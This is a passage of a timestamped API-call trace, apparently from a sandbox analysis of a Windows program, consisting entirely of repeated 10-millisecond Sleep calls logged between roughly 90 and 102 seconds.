(dwMilliseconds=0xa) [0090.123] Sleep (dwMilliseconds=0xa) [0090.171] Sleep (dwMilliseconds=0xa) [0090.177] Sleep (dwMilliseconds=0xa) [0090.192] Sleep (dwMilliseconds=0xa) [0090.233] Sleep (dwMilliseconds=0xa) [0090.263] Sleep (dwMilliseconds=0xa) [0090.270] Sleep (dwMilliseconds=0xa) [0090.291] Sleep (dwMilliseconds=0xa) [0090.302] Sleep (dwMilliseconds=0xa) [0090.317] Sleep (dwMilliseconds=0xa) [0090.334] Sleep (dwMilliseconds=0xa) [0090.353] Sleep (dwMilliseconds=0xa) [0090.368] Sleep (dwMilliseconds=0xa) [0090.417] Sleep (dwMilliseconds=0xa) [0090.428] Sleep (dwMilliseconds=0xa) [0090.443] Sleep (dwMilliseconds=0xa) [0090.458] Sleep (dwMilliseconds=0xa) [0090.473] Sleep (dwMilliseconds=0xa) [0090.489] Sleep (dwMilliseconds=0xa) [0090.504] Sleep (dwMilliseconds=0xa) [0090.525] Sleep (dwMilliseconds=0xa) [0090.536] Sleep (dwMilliseconds=0xa) [0090.572] Sleep (dwMilliseconds=0xa) [0090.601] Sleep (dwMilliseconds=0xa) [0090.614] Sleep (dwMilliseconds=0xa) [0090.629] Sleep (dwMilliseconds=0xa) [0090.645] Sleep (dwMilliseconds=0xa) [0090.661] Sleep (dwMilliseconds=0xa) [0090.676] Sleep (dwMilliseconds=0xa) [0090.692] Sleep (dwMilliseconds=0xa) [0090.721] Sleep (dwMilliseconds=0xa) [0090.754] Sleep (dwMilliseconds=0xa) [0090.789] Sleep (dwMilliseconds=0xa) [0090.804] Sleep (dwMilliseconds=0xa) [0090.817] Sleep (dwMilliseconds=0xa) [0090.832] Sleep (dwMilliseconds=0xa) [0090.851] Sleep (dwMilliseconds=0xa) [0090.863] Sleep (dwMilliseconds=0xa) [0090.879] Sleep (dwMilliseconds=0xa) [0090.895] Sleep (dwMilliseconds=0xa) [0090.942] Sleep (dwMilliseconds=0xa) [0090.966] Sleep (dwMilliseconds=0xa) [0090.972] Sleep (dwMilliseconds=0xa) [0090.992] Sleep (dwMilliseconds=0xa) [0091.004] Sleep (dwMilliseconds=0xa) [0091.019] Sleep (dwMilliseconds=0xa) [0091.035] Sleep (dwMilliseconds=0xa) [0091.051] Sleep (dwMilliseconds=0xa) [0091.071] Sleep (dwMilliseconds=0xa) [0091.113] Sleep (dwMilliseconds=0xa) [0091.129] Sleep (dwMilliseconds=0xa) [0091.144] Sleep (dwMilliseconds=0xa) [0091.160] Sleep (dwMilliseconds=0xa) [0091.175] Sleep (dwMilliseconds=0xa) [0091.191] Sleep (dwMilliseconds=0xa) [0091.206] Sleep (dwMilliseconds=0xa) [0091.222] Sleep (dwMilliseconds=0xa) [0091.269] Sleep (dwMilliseconds=0xa) [0091.284] Sleep (dwMilliseconds=0xa) [0091.300] Sleep (dwMilliseconds=0xa) [0091.317] Sleep (dwMilliseconds=0xa) [0091.331] Sleep (dwMilliseconds=0xa) [0091.347] Sleep (dwMilliseconds=0xa) [0091.363] Sleep (dwMilliseconds=0xa) [0091.378] Sleep (dwMilliseconds=0xa) [0091.426] Sleep (dwMilliseconds=0xa) [0091.440] Sleep (dwMilliseconds=0xa) [0091.456] Sleep (dwMilliseconds=0xa) [0091.472] Sleep (dwMilliseconds=0xa) [0091.487] Sleep (dwMilliseconds=0xa) [0091.503] Sleep (dwMilliseconds=0xa) [0091.524] Sleep (dwMilliseconds=0xa) [0091.534] Sleep (dwMilliseconds=0xa) [0091.581] Sleep (dwMilliseconds=0xa) [0091.596] Sleep (dwMilliseconds=0xa) [0091.612] Sleep (dwMilliseconds=0xa) [0091.628] Sleep (dwMilliseconds=0xa) [0091.644] Sleep (dwMilliseconds=0xa) [0091.659] Sleep (dwMilliseconds=0xa) [0091.674] Sleep (dwMilliseconds=0xa) [0091.690] Sleep (dwMilliseconds=0xa) [0091.738] Sleep (dwMilliseconds=0xa) [0091.767] Sleep (dwMilliseconds=0xa) [0091.768] Sleep (dwMilliseconds=0xa) [0091.788] Sleep (dwMilliseconds=0xa) [0091.800] Sleep (dwMilliseconds=0xa) [0091.815] Sleep (dwMilliseconds=0xa) [0091.834] Sleep (dwMilliseconds=0xa) [0091.846] Sleep (dwMilliseconds=0xa) [0091.862] Sleep (dwMilliseconds=0xa) [0091.911] Sleep (dwMilliseconds=0xa) [0091.936] Sleep (dwMilliseconds=0xa) [0091.941] Sleep (dwMilliseconds=0xa) [0091.955] Sleep (dwMilliseconds=0xa) [0091.971] Sleep (dwMilliseconds=0xa) [0091.987] Sleep (dwMilliseconds=0xa) [0092.003] Sleep (dwMilliseconds=0xa) [0092.018] Sleep (dwMilliseconds=0xa) [0092.036] Sleep (dwMilliseconds=0xa) [0092.092] Sleep (dwMilliseconds=0xa) [0092.111] Sleep (dwMilliseconds=0xa) [0092.122] Sleep (dwMilliseconds=0xa) [0092.127] Sleep (dwMilliseconds=0xa) [0092.142] Sleep (dwMilliseconds=0xa) [0092.159] Sleep (dwMilliseconds=0xa) [0092.176] Sleep (dwMilliseconds=0xa) [0092.189] Sleep (dwMilliseconds=0xa) [0092.210] Sleep (dwMilliseconds=0xa) [0092.268] Sleep (dwMilliseconds=0xa) [0092.288] Sleep (dwMilliseconds=0xa) [0092.298] Sleep (dwMilliseconds=0xa) [0092.314] Sleep (dwMilliseconds=0xa) [0092.330] Sleep (dwMilliseconds=0xa) [0092.345] Sleep (dwMilliseconds=0xa) [0092.362] Sleep (dwMilliseconds=0xa) [0092.378] Sleep (dwMilliseconds=0xa) [0092.392] Sleep (dwMilliseconds=0xa) [0092.439] Sleep (dwMilliseconds=0xa) [0092.459] Sleep (dwMilliseconds=0xa) [0092.470] Sleep (dwMilliseconds=0xa) [0092.487] Sleep (dwMilliseconds=0xa) [0092.501] Sleep (dwMilliseconds=0xa) [0092.517] Sleep (dwMilliseconds=0xa) [0092.532] Sleep (dwMilliseconds=0xa) [0092.548] Sleep (dwMilliseconds=0xa) [0092.564] Sleep (dwMilliseconds=0xa) [0092.610] Sleep (dwMilliseconds=0xa) [0092.633] Sleep (dwMilliseconds=0xa) [0092.641] Sleep (dwMilliseconds=0xa) [0092.658] Sleep (dwMilliseconds=0xa) [0092.673] Sleep (dwMilliseconds=0xa) [0092.688] Sleep (dwMilliseconds=0xa) [0092.720] Sleep (dwMilliseconds=0xa) [0092.735] Sleep (dwMilliseconds=0xa) [0092.782] Sleep (dwMilliseconds=0xa) [0092.800] Sleep (dwMilliseconds=0xa) [0092.813] Sleep (dwMilliseconds=0xa) [0092.830] Sleep (dwMilliseconds=0xa) [0092.844] Sleep (dwMilliseconds=0xa) [0092.860] Sleep (dwMilliseconds=0xa) [0092.876] Sleep (dwMilliseconds=0xa) [0092.891] Sleep (dwMilliseconds=0xa) [0092.907] Sleep (dwMilliseconds=0xa) [0092.954] Sleep (dwMilliseconds=0xa) [0092.969] Sleep (dwMilliseconds=0xa) [0092.985] Sleep (dwMilliseconds=0xa) [0093.000] Sleep (dwMilliseconds=0xa) [0093.017] Sleep (dwMilliseconds=0xa) [0093.033] Sleep (dwMilliseconds=0xa) [0093.047] Sleep (dwMilliseconds=0xa) [0093.063] Sleep (dwMilliseconds=0xa) [0093.118] Sleep (dwMilliseconds=0xa) [0093.127] Sleep (dwMilliseconds=0xa) [0093.142] Sleep (dwMilliseconds=0xa) [0093.156] Sleep (dwMilliseconds=0xa) [0093.172] Sleep (dwMilliseconds=0xa) [0093.188] Sleep (dwMilliseconds=0xa) [0093.203] Sleep (dwMilliseconds=0xa) [0093.219] Sleep (dwMilliseconds=0xa) [0093.234] Sleep (dwMilliseconds=0xa) [0093.281] Sleep (dwMilliseconds=0xa) [0093.297] Sleep (dwMilliseconds=0xa) [0093.312] Sleep (dwMilliseconds=0xa) [0093.328] Sleep (dwMilliseconds=0xa) [0093.347] Sleep (dwMilliseconds=0xa) [0093.360] Sleep (dwMilliseconds=0xa) [0093.375] Sleep (dwMilliseconds=0xa) [0093.390] Sleep (dwMilliseconds=0xa) [0093.437] Sleep (dwMilliseconds=0xa) [0093.453] Sleep (dwMilliseconds=0xa) [0093.470] Sleep (dwMilliseconds=0xa) [0093.484] Sleep (dwMilliseconds=0xa) [0093.500] Sleep (dwMilliseconds=0xa) [0093.515] Sleep (dwMilliseconds=0xa) [0093.531] Sleep (dwMilliseconds=0xa) [0093.546] Sleep (dwMilliseconds=0xa) [0093.594] Sleep (dwMilliseconds=0xa) [0093.609] Sleep (dwMilliseconds=0xa) [0093.624] Sleep (dwMilliseconds=0xa) [0093.640] Sleep (dwMilliseconds=0xa) [0093.656] Sleep (dwMilliseconds=0xa) [0093.673] Sleep (dwMilliseconds=0xa) [0093.687] Sleep (dwMilliseconds=0xa) [0093.717] Sleep (dwMilliseconds=0xa) [0093.750] Sleep (dwMilliseconds=0xa) [0093.770] Sleep (dwMilliseconds=0xa) [0093.780] Sleep (dwMilliseconds=0xa) [0093.796] Sleep (dwMilliseconds=0xa) [0093.811] Sleep (dwMilliseconds=0xa) [0093.828] Sleep (dwMilliseconds=0xa) [0093.843] Sleep (dwMilliseconds=0xa) [0093.858] Sleep (dwMilliseconds=0xa) [0093.874] Sleep (dwMilliseconds=0xa) [0093.921] Sleep (dwMilliseconds=0xa) [0093.936] Sleep (dwMilliseconds=0xa) [0093.952] Sleep (dwMilliseconds=0xa) [0093.968] Sleep (dwMilliseconds=0xa) [0093.983] Sleep (dwMilliseconds=0xa) [0093.999] Sleep (dwMilliseconds=0xa) [0094.014] Sleep (dwMilliseconds=0xa) [0094.030] Sleep (dwMilliseconds=0xa) [0094.077] Sleep (dwMilliseconds=0xa) [0094.092] Sleep (dwMilliseconds=0xa) [0094.109] Sleep (dwMilliseconds=0xa) [0094.129] Sleep (dwMilliseconds=0xa) [0094.139] Sleep (dwMilliseconds=0xa) [0094.156] Sleep (dwMilliseconds=0xa) [0094.170] Sleep (dwMilliseconds=0xa) [0094.186] Sleep (dwMilliseconds=0xa) [0094.265] Sleep (dwMilliseconds=0xa) [0094.283] Sleep (dwMilliseconds=0xa) [0094.295] Sleep (dwMilliseconds=0xa) [0094.312] Sleep (dwMilliseconds=0xa) [0094.326] Sleep (dwMilliseconds=0xa) [0094.342] Sleep (dwMilliseconds=0xa) [0094.358] Sleep (dwMilliseconds=0xa) [0094.374] Sleep (dwMilliseconds=0xa) [0094.390] Sleep (dwMilliseconds=0xa) [0094.436] Sleep (dwMilliseconds=0xa) [0094.451] Sleep (dwMilliseconds=0xa) [0094.467] Sleep (dwMilliseconds=0xa) [0094.484] Sleep (dwMilliseconds=0xa) [0094.498] Sleep (dwMilliseconds=0xa) [0094.513] Sleep (dwMilliseconds=0xa) [0094.529] Sleep (dwMilliseconds=0xa) [0094.545] Sleep (dwMilliseconds=0xa) [0094.594] Sleep (dwMilliseconds=0xa) [0094.607] Sleep (dwMilliseconds=0xa) [0094.623] Sleep (dwMilliseconds=0xa) [0094.639] Sleep (dwMilliseconds=0xa) [0094.654] Sleep (dwMilliseconds=0xa) [0094.670] Sleep (dwMilliseconds=0xa) [0094.685] Sleep (dwMilliseconds=0xa) [0094.715] Sleep (dwMilliseconds=0xa) [0094.763] Sleep (dwMilliseconds=0xa) [0094.780] Sleep (dwMilliseconds=0xa) [0094.794] Sleep (dwMilliseconds=0xa) [0094.810] Sleep (dwMilliseconds=0xa) [0094.826] Sleep (dwMilliseconds=0xa) [0094.841] Sleep (dwMilliseconds=0xa) [0094.858] Sleep (dwMilliseconds=0xa) [0094.872] Sleep (dwMilliseconds=0xa) [0094.888] Sleep (dwMilliseconds=0xa) [0094.936] Sleep (dwMilliseconds=0xa) [0094.953] Sleep (dwMilliseconds=0xa) [0094.966] Sleep (dwMilliseconds=0xa) [0094.982] Sleep (dwMilliseconds=0xa) [0094.997] Sleep (dwMilliseconds=0xa) [0095.013] Sleep (dwMilliseconds=0xa) [0095.028] Sleep (dwMilliseconds=0xa) [0095.045] Sleep (dwMilliseconds=0xa) [0095.061] Sleep (dwMilliseconds=0xa) [0095.107] Sleep (dwMilliseconds=0xa) [0095.138] Sleep (dwMilliseconds=0xa) [0095.153] Sleep (dwMilliseconds=0xa) [0095.169] Sleep (dwMilliseconds=0xa) [0095.184] Sleep (dwMilliseconds=0xa) [0095.200] Sleep (dwMilliseconds=0xa) [0095.216] Sleep (dwMilliseconds=0xa) [0095.232] Sleep (dwMilliseconds=0xa) [0095.278] Sleep (dwMilliseconds=0xa) [0095.300] Sleep (dwMilliseconds=0xa) [0095.309] Sleep (dwMilliseconds=0xa) [0095.325] Sleep (dwMilliseconds=0xa) [0095.341] Sleep (dwMilliseconds=0xa) [0095.358] Sleep (dwMilliseconds=0xa) [0095.372] Sleep (dwMilliseconds=0xa) [0095.387] Sleep (dwMilliseconds=0xa) [0095.403] Sleep (dwMilliseconds=0xa) [0095.451] Sleep (dwMilliseconds=0xa) [0095.465] Sleep (dwMilliseconds=0xa) [0095.481] Sleep (dwMilliseconds=0xa) [0095.496] Sleep (dwMilliseconds=0xa) [0095.512] Sleep (dwMilliseconds=0xa) [0095.528] Sleep (dwMilliseconds=0xa) [0095.543] Sleep (dwMilliseconds=0xa) [0095.559] Sleep (dwMilliseconds=0xa) [0095.606] Sleep (dwMilliseconds=0xa) [0095.621] Sleep (dwMilliseconds=0xa) [0095.637] Sleep (dwMilliseconds=0xa) [0095.653] Sleep (dwMilliseconds=0xa) [0095.668] Sleep (dwMilliseconds=0xa) [0095.684] Sleep (dwMilliseconds=0xa) [0095.716] Sleep (dwMilliseconds=0xa) [0095.762] Sleep (dwMilliseconds=0xa) [0095.784] Sleep (dwMilliseconds=0xa) [0095.793] Sleep (dwMilliseconds=0xa) [0095.808] Sleep (dwMilliseconds=0xa) [0095.824] Sleep (dwMilliseconds=0xa) [0095.842] Sleep (dwMilliseconds=0xa) [0095.855] Sleep (dwMilliseconds=0xa) [0095.871] Sleep (dwMilliseconds=0xa) [0095.886] Sleep (dwMilliseconds=0xa) [0095.935] Sleep (dwMilliseconds=0xa) [0095.949] Sleep (dwMilliseconds=0xa) [0095.964] Sleep (dwMilliseconds=0xa) [0095.980] Sleep (dwMilliseconds=0xa) [0095.996] Sleep (dwMilliseconds=0xa) [0096.011] Sleep (dwMilliseconds=0xa) [0096.027] Sleep (dwMilliseconds=0xa) [0096.043] Sleep (dwMilliseconds=0xa) [0096.092] Sleep (dwMilliseconds=0xa) [0096.110] Sleep (dwMilliseconds=0xa) [0096.120] Sleep (dwMilliseconds=0xa) [0096.146] Sleep (dwMilliseconds=0xa) [0096.154] Sleep (dwMilliseconds=0xa) [0096.167] Sleep (dwMilliseconds=0xa) [0096.187] Sleep (dwMilliseconds=0xa) [0096.198] Sleep (dwMilliseconds=0xa) [0096.214] Sleep (dwMilliseconds=0xa) [0096.261] Sleep (dwMilliseconds=0xa) [0096.280] Sleep (dwMilliseconds=0xa) [0096.292] Sleep (dwMilliseconds=0xa) [0096.308] Sleep (dwMilliseconds=0xa) [0096.323] Sleep (dwMilliseconds=0xa) [0096.339] Sleep (dwMilliseconds=0xa) [0096.359] Sleep (dwMilliseconds=0xa) [0096.370] Sleep (dwMilliseconds=0xa) [0096.386] Sleep (dwMilliseconds=0xa) [0096.418] Sleep (dwMilliseconds=0xa) [0096.439] Sleep (dwMilliseconds=0xa) [0096.448] Sleep (dwMilliseconds=0xa) [0096.465] Sleep (dwMilliseconds=0xa) [0096.479] Sleep (dwMilliseconds=0xa) [0096.495] Sleep (dwMilliseconds=0xa) [0096.510] Sleep (dwMilliseconds=0xa) [0096.527] Sleep (dwMilliseconds=0xa) [0096.542] Sleep (dwMilliseconds=0xa) [0096.579] Sleep (dwMilliseconds=0xa) [0096.600] Sleep (dwMilliseconds=0xa) [0096.604] Sleep (dwMilliseconds=0xa) [0096.620] Sleep (dwMilliseconds=0xa) [0096.635] Sleep (dwMilliseconds=0xa) [0096.656] Sleep (dwMilliseconds=0xa) [0096.672] Sleep (dwMilliseconds=0xa) [0096.683] Sleep (dwMilliseconds=0xa) [0096.712] Sleep (dwMilliseconds=0xa) [0096.746] Sleep (dwMilliseconds=0xa) [0096.782] Sleep (dwMilliseconds=0xa) [0096.791] Sleep (dwMilliseconds=0xa) [0096.809] Sleep (dwMilliseconds=0xa) [0096.824] Sleep (dwMilliseconds=0xa) [0096.838] Sleep (dwMilliseconds=0xa) [0096.854] Sleep (dwMilliseconds=0xa) [0096.869] Sleep (dwMilliseconds=0xa) [0096.885] Sleep (dwMilliseconds=0xa) [0096.932] Sleep (dwMilliseconds=0xa) [0096.953] Sleep (dwMilliseconds=0xa) [0096.963] Sleep (dwMilliseconds=0xa) [0096.979] Sleep (dwMilliseconds=0xa) [0096.995] Sleep (dwMilliseconds=0xa) [0097.010] Sleep (dwMilliseconds=0xa) [0097.025] Sleep (dwMilliseconds=0xa) [0097.041] Sleep (dwMilliseconds=0xa) [0097.056] Sleep (dwMilliseconds=0xa) [0097.107] Sleep (dwMilliseconds=0xa) [0097.126] Sleep (dwMilliseconds=0xa) [0097.135] Sleep (dwMilliseconds=0xa) [0097.150] Sleep (dwMilliseconds=0xa) [0097.166] Sleep (dwMilliseconds=0xa) [0097.181] Sleep (dwMilliseconds=0xa) [0097.200] Sleep (dwMilliseconds=0xa) [0097.213] Sleep (dwMilliseconds=0xa) [0097.228] Sleep (dwMilliseconds=0xa) [0097.275] Sleep (dwMilliseconds=0xa) [0097.293] Sleep (dwMilliseconds=0xa) [0097.306] Sleep (dwMilliseconds=0xa) [0097.323] Sleep (dwMilliseconds=0xa) [0097.337] Sleep (dwMilliseconds=0xa) [0097.353] Sleep (dwMilliseconds=0xa) [0097.369] Sleep (dwMilliseconds=0xa) [0097.384] Sleep (dwMilliseconds=0xa) [0097.400] Sleep (dwMilliseconds=0xa) [0097.446] Sleep (dwMilliseconds=0xa) [0097.462] Sleep (dwMilliseconds=0xa) [0097.478] Sleep (dwMilliseconds=0xa) [0097.494] Sleep (dwMilliseconds=0xa) [0097.509] Sleep (dwMilliseconds=0xa) [0097.527] Sleep (dwMilliseconds=0xa) [0097.540] Sleep (dwMilliseconds=0xa) [0097.556] Sleep (dwMilliseconds=0xa) [0097.602] Sleep (dwMilliseconds=0xa) [0097.621] Sleep (dwMilliseconds=0xa) [0097.634] Sleep (dwMilliseconds=0xa) [0097.649] Sleep (dwMilliseconds=0xa) [0097.665] Sleep (dwMilliseconds=0xa) [0097.680] Sleep (dwMilliseconds=0xa) [0097.711] Sleep (dwMilliseconds=0xa) [0097.712] Sleep (dwMilliseconds=0xa) [0097.727] Sleep (dwMilliseconds=0xa) [0097.774] Sleep (dwMilliseconds=0xa) [0097.789] Sleep (dwMilliseconds=0xa) [0097.806] Sleep (dwMilliseconds=0xa) [0097.822] Sleep (dwMilliseconds=0xa) [0097.836] Sleep (dwMilliseconds=0xa) [0097.854] Sleep (dwMilliseconds=0xa) [0097.868] Sleep (dwMilliseconds=0xa) [0097.883] Sleep (dwMilliseconds=0xa) [0097.917] Sleep (dwMilliseconds=0xa) [0097.941] Sleep (dwMilliseconds=0xa) [0097.945] Sleep (dwMilliseconds=0xa) [0097.962] Sleep (dwMilliseconds=0xa) [0097.977] Sleep (dwMilliseconds=0xa) [0097.992] Sleep (dwMilliseconds=0xa) [0098.008] Sleep (dwMilliseconds=0xa) [0098.024] Sleep (dwMilliseconds=0xa) [0098.039] Sleep (dwMilliseconds=0xa) [0098.087] Sleep (dwMilliseconds=0xa) [0098.107] Sleep (dwMilliseconds=0xa) [0098.117] Sleep (dwMilliseconds=0xa) [0098.133] Sleep (dwMilliseconds=0xa) [0098.156] Sleep (dwMilliseconds=0xa) [0098.164] Sleep (dwMilliseconds=0xa) [0098.180] Sleep (dwMilliseconds=0xa) [0098.197] Sleep (dwMilliseconds=0xa) [0098.243] Sleep (dwMilliseconds=0xa) [0098.259] Sleep (dwMilliseconds=0xa) [0098.273] Sleep (dwMilliseconds=0xa) [0098.289] Sleep (dwMilliseconds=0xa) [0098.309] Sleep (dwMilliseconds=0xa) [0098.320] Sleep (dwMilliseconds=0xa) [0098.337] Sleep (dwMilliseconds=0xa) [0098.351] Sleep (dwMilliseconds=0xa) [0098.367] Sleep (dwMilliseconds=0xa) [0098.414] Sleep (dwMilliseconds=0xa) [0098.430] Sleep (dwMilliseconds=0xa) [0098.450] Sleep (dwMilliseconds=0xa) [0098.463] Sleep (dwMilliseconds=0xa) [0098.476] Sleep (dwMilliseconds=0xa) [0098.492] Sleep (dwMilliseconds=0xa) [0098.507] Sleep (dwMilliseconds=0xa) [0098.526] Sleep (dwMilliseconds=0xa) [0098.570] Sleep (dwMilliseconds=0xa) [0098.594] Sleep (dwMilliseconds=0xa) [0098.601] Sleep (dwMilliseconds=0xa) [0098.617] Sleep (dwMilliseconds=0xa) [0098.633] Sleep (dwMilliseconds=0xa) [0098.648] Sleep (dwMilliseconds=0xa) [0098.663] Sleep (dwMilliseconds=0xa) [0098.679] Sleep (dwMilliseconds=0xa) [0098.716] Sleep (dwMilliseconds=0xa) [0098.757] Sleep (dwMilliseconds=0xa) [0098.772] Sleep (dwMilliseconds=0xa) [0098.788] Sleep (dwMilliseconds=0xa) [0098.804] Sleep (dwMilliseconds=0xa) [0098.819] Sleep (dwMilliseconds=0xa) [0098.835] Sleep (dwMilliseconds=0xa) [0098.852] Sleep (dwMilliseconds=0xa) [0098.866] Sleep (dwMilliseconds=0xa) [0098.913] Sleep (dwMilliseconds=0xa) [0098.929] Sleep (dwMilliseconds=0xa) [0098.944] Sleep (dwMilliseconds=0xa) [0098.961] Sleep (dwMilliseconds=0xa) [0098.975] Sleep (dwMilliseconds=0xa) [0098.991] Sleep (dwMilliseconds=0xa) [0099.006] Sleep (dwMilliseconds=0xa) [0099.025] Sleep (dwMilliseconds=0xa) [0099.070] Sleep (dwMilliseconds=0xa) [0099.087] Sleep (dwMilliseconds=0xa) [0099.100] Sleep (dwMilliseconds=0xa) [0099.116] Sleep (dwMilliseconds=0xa) [0099.131] Sleep (dwMilliseconds=0xa) [0099.147] Sleep (dwMilliseconds=0xa) [0099.164] Sleep (dwMilliseconds=0xa) [0099.178] Sleep (dwMilliseconds=0xa) [0099.194] Sleep (dwMilliseconds=0xa) [0099.244] Sleep (dwMilliseconds=0xa) [0099.256] Sleep (dwMilliseconds=0xa) [0099.278] Sleep (dwMilliseconds=0xa) [0099.287] Sleep (dwMilliseconds=0xa) [0099.303] Sleep (dwMilliseconds=0xa) [0099.318] Sleep (dwMilliseconds=0xa) [0099.334] Sleep (dwMilliseconds=0xa) [0099.351] Sleep (dwMilliseconds=0xa) [0099.366] Sleep (dwMilliseconds=0xa) [0099.413] Sleep (dwMilliseconds=0xa) [0099.430] Sleep (dwMilliseconds=0xa) [0099.443] Sleep (dwMilliseconds=0xa) [0099.459] Sleep (dwMilliseconds=0xa) [0099.474] Sleep (dwMilliseconds=0xa) [0099.490] Sleep (dwMilliseconds=0xa) [0099.506] Sleep (dwMilliseconds=0xa) [0099.521] Sleep (dwMilliseconds=0xa) [0099.537] Sleep (dwMilliseconds=0xa) [0099.584] Sleep (dwMilliseconds=0xa) [0099.603] Sleep (dwMilliseconds=0xa) [0099.616] Sleep (dwMilliseconds=0xa) [0099.630] Sleep (dwMilliseconds=0xa) [0099.646] Sleep (dwMilliseconds=0xa) [0099.662] Sleep (dwMilliseconds=0xa) [0099.677] Sleep (dwMilliseconds=0xa) [0099.693] Sleep (dwMilliseconds=0xa) [0099.732] Sleep (dwMilliseconds=0xa) [0099.772] Sleep (dwMilliseconds=0xa) [0099.803] Sleep (dwMilliseconds=0xa) [0099.817] Sleep (dwMilliseconds=0xa) [0099.836] Sleep (dwMilliseconds=0xa) [0099.852] Sleep (dwMilliseconds=0xa) [0099.864] Sleep (dwMilliseconds=0xa) [0099.880] Sleep (dwMilliseconds=0xa) [0099.896] Sleep (dwMilliseconds=0xa) [0099.913] Sleep (dwMilliseconds=0xa) [0099.961] Sleep (dwMilliseconds=0xa) [0099.984] Sleep (dwMilliseconds=0xa) [0099.989] Sleep (dwMilliseconds=0xa) [0100.005] Sleep (dwMilliseconds=0xa) [0100.021] Sleep (dwMilliseconds=0xa) [0100.036] Sleep (dwMilliseconds=0xa) [0100.052] Sleep (dwMilliseconds=0xa) [0100.077] Sleep (dwMilliseconds=0xa) [0100.083] Sleep (dwMilliseconds=0xa) [0100.131] Sleep (dwMilliseconds=0xa) [0100.157] Sleep (dwMilliseconds=0xa) [0100.166] Sleep (dwMilliseconds=0xa) [0100.177] Sleep (dwMilliseconds=0xa) [0100.192] Sleep (dwMilliseconds=0xa) [0100.208] Sleep (dwMilliseconds=0xa) [0100.223] Sleep (dwMilliseconds=0xa) [0100.239] Sleep (dwMilliseconds=0xa) [0100.254] Sleep (dwMilliseconds=0xa) [0100.303] Sleep (dwMilliseconds=0xa) [0100.324] Sleep (dwMilliseconds=0xa) [0100.332] Sleep (dwMilliseconds=0xa) [0100.348] Sleep (dwMilliseconds=0xa) [0100.364] Sleep (dwMilliseconds=0xa) [0100.379] Sleep (dwMilliseconds=0xa) [0100.396] Sleep (dwMilliseconds=0xa) [0100.410] Sleep (dwMilliseconds=0xa) [0100.426] Sleep (dwMilliseconds=0xa) [0100.460] Sleep (dwMilliseconds=0xa) [0100.481] Sleep (dwMilliseconds=0xa) [0100.488] Sleep (dwMilliseconds=0xa) [0100.505] Sleep (dwMilliseconds=0xa) [0100.520] Sleep (dwMilliseconds=0xa) [0100.535] Sleep (dwMilliseconds=0xa) [0100.551] Sleep (dwMilliseconds=0xa) [0100.566] Sleep (dwMilliseconds=0xa) [0100.582] Sleep (dwMilliseconds=0xa) [0100.629] Sleep (dwMilliseconds=0xa) [0100.644] Sleep (dwMilliseconds=0xa) [0100.660] Sleep (dwMilliseconds=0xa) [0100.676] Sleep (dwMilliseconds=0xa) [0100.691] Sleep (dwMilliseconds=0xa) [0100.721] Sleep (dwMilliseconds=0xa) [0100.722] Sleep (dwMilliseconds=0xa) [0100.738] Sleep (dwMilliseconds=0xa) [0100.786] Sleep (dwMilliseconds=0xa) [0100.801] Sleep (dwMilliseconds=0xa) [0100.816] Sleep (dwMilliseconds=0xa) [0100.831] Sleep (dwMilliseconds=0xa) [0100.851] Sleep (dwMilliseconds=0xa) [0100.863] Sleep (dwMilliseconds=0xa) [0100.878] Sleep (dwMilliseconds=0xa) [0100.894] Sleep (dwMilliseconds=0xa) [0100.941] Sleep (dwMilliseconds=0xa) [0100.956] Sleep (dwMilliseconds=0xa) [0100.974] Sleep (dwMilliseconds=0xa) [0100.988] Sleep (dwMilliseconds=0xa) [0101.003] Sleep (dwMilliseconds=0xa) [0101.019] Sleep (dwMilliseconds=0xa) [0101.034] Sleep (dwMilliseconds=0xa) [0101.050] Sleep (dwMilliseconds=0xa) [0101.097] Sleep (dwMilliseconds=0xa) [0101.123] Sleep (dwMilliseconds=0xa) [0101.128] Sleep (dwMilliseconds=0xa) [0101.144] Sleep (dwMilliseconds=0xa) [0101.170] Sleep (dwMilliseconds=0xa) [0101.179] Sleep (dwMilliseconds=0xa) [0101.190] Sleep (dwMilliseconds=0xa) [0101.206] Sleep (dwMilliseconds=0xa) [0101.222] Sleep (dwMilliseconds=0xa) [0101.268] Sleep (dwMilliseconds=0xa) [0101.284] Sleep (dwMilliseconds=0xa) [0101.300] Sleep (dwMilliseconds=0xa) [0101.315] Sleep (dwMilliseconds=0xa) [0101.331] Sleep (dwMilliseconds=0xa) [0101.346] Sleep (dwMilliseconds=0xa) [0101.363] Sleep (dwMilliseconds=0xa) [0101.379] Sleep (dwMilliseconds=0xa) [0101.425] Sleep (dwMilliseconds=0xa) [0101.442] Sleep (dwMilliseconds=0xa) [0101.456] Sleep (dwMilliseconds=0xa) [0101.471] Sleep (dwMilliseconds=0xa) [0101.489] Sleep (dwMilliseconds=0xa) [0101.503] Sleep (dwMilliseconds=0xa) [0101.519] Sleep (dwMilliseconds=0xa) [0101.534] Sleep (dwMilliseconds=0xa) [0101.568] Sleep (dwMilliseconds=0xa) [0101.599] Sleep (dwMilliseconds=0xa) [0101.612] Sleep (dwMilliseconds=0xa) [0101.627] Sleep (dwMilliseconds=0xa) [0101.643] Sleep (dwMilliseconds=0xa) [0101.658] Sleep (dwMilliseconds=0xa) [0101.674] Sleep (dwMilliseconds=0xa) [0101.690] Sleep (dwMilliseconds=0xa) [0101.724] Sleep (dwMilliseconds=0xa) [0101.768] Sleep (dwMilliseconds=0xa) [0101.788] Sleep (dwMilliseconds=0xa) [0101.799] Sleep (dwMilliseconds=0xa) [0101.814] Sleep (dwMilliseconds=0xa) [0101.831] Sleep (dwMilliseconds=0xa) [0101.846] Sleep (dwMilliseconds=0xa) [0101.861] Sleep (dwMilliseconds=0xa) [0101.877] Sleep (dwMilliseconds=0xa) [0101.893] Sleep (dwMilliseconds=0xa) [0101.940] Sleep (dwMilliseconds=0xa) [0101.957] Sleep (dwMilliseconds=0xa) [0101.970] Sleep (dwMilliseconds=0xa) [0101.986] Sleep (dwMilliseconds=0xa) [0102.002] Sleep (dwMilliseconds=0xa) [0102.017] Sleep (dwMilliseconds=0xa) [0102.033] Sleep (dwMilliseconds=0xa) [0102.050] Sleep (dwMilliseconds=0xa) [0102.096] Sleep (dwMilliseconds=0xa) [0102.132] Sleep (dwMilliseconds=0xa) [0102.142] Sleep (dwMilliseconds=0xa) [0102.159] Sleep (dwMilliseconds=0xa) [0102.173] Sleep (dwMilliseconds=0xa) [0102.189] Sleep (dwMilliseconds=0xa) [0102.204] Sleep (dwMilliseconds=0xa) [0102.220] Sleep (dwMilliseconds=0xa) [0102.236] Sleep (dwMilliseconds=0xa) [0102.289] Sleep (dwMilliseconds=0xa) [0102.310] Sleep (dwMilliseconds=0xa) [0102.313] 